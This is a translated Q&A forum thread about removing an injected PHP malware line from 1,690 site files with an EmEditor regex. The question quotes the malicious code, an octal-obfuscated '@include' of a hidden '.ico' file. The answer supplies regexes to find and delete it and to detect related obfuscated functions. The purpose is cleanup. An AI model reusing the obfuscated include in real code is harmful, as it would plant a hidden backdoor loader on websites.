Я пытаюсь найти способ поиска и замены с помощью EMEditor и регулярного выражения. Я пытаюсь применить это для элемента ниже:
<?php
/*f04b8*/
@include "\057mn\164/r\141id\057ho\155e/\164ap\151om\171/h\164do\143s/\124ap\151oP\157rt\141l/\154ib\162ar\151es\057.d\1419e\06484\063.i\143o";
/*f04b8*/ // ini_set(?display_errors?, 1);
Я пытаюсь заменить/стереть код между
<?php
и
// ini_set(?display_errors?, 1);
все, что находится между ними, — это вредоносный скрипт, который я пытаюсь извлечь из многих файлов.
Я ищу простой способ удалить это в файлах 1690. Любая идея будет очень полезна.
С наилучшими пожеланиями, Томас
решение1
PHP RegExpression для любых похожих строк будет...
/(\/\*.....\*\/\r\n\r\n@include.".*.";\r\n\r\n\/\*.....\*\/|\/\*.....\*\/\n\n@include.".*.";\n\n\/\*.....\*\/)/
Это можно упростить еще больше, но работает и так.
**Обратите внимание, что будут найдены все вхождения подозрительных строк, начинающихся с блока комментариев, содержащего 5 случайных символов, не являющихся символами новой строки, за которыми следуют две новые строки, строка @include, еще 2 новые строки и соответствующий блок комментариев — независимо от того, был ли документ сохранен на машинах Windows, Mac или Linux — обратите внимание на \r\n (машины Windows) и \n\n (машины Linux и Mac)
Я проверил совпадения ваших строк с регулярным выражением по адресу: https://ingram-braun.net/erga/online-regex-tester-perl-php-javascript/
Краткое замечание: чтобы найти файлы вредоносного ПО, содержащие случайные имена строк, в которых содержатся запутанные функции... используйте следующее регулярное выражение...
/function...\(\$..\){\$...\=."/
Это позволит отследить измененные файлы и найти любые дополнительные вредоносные файлы того же вредоносного ПО, которому вы подверглись.
Хорошего дня! Надеюсь, это еще кому-то пригодится.